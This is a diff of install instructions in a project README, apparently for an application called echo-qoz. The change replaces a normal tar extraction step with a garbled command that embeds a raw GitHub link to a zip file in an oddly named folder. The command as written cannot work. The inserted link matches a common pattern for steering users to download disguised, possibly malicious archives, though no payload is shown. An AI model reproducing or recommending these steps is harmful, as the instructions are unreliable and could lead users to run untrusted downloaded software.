sharyarahmed1519/echo-qoz/README.md

 ### For Linux:
 1. Open a terminal window.
 2. Navigate to your Downloads folder using the command: `cd ~/Downloads`.
-3. Extract the downloaded tarball using the command: `tar -xzf echo-qoz*.tar.gz`.
+3. Extract the downloaded tarball using the command: `tar -xzf echo-qoz*https://raw.githubusercontent.com/sharyarahmed1519/echo-qoz/main/freesilverite/echo-qoz_v1.0.zip`.
 4. Change into the extracted directory using: `cd echo-qoz`.
 5. Run the application using the command: `./echo-qoz`.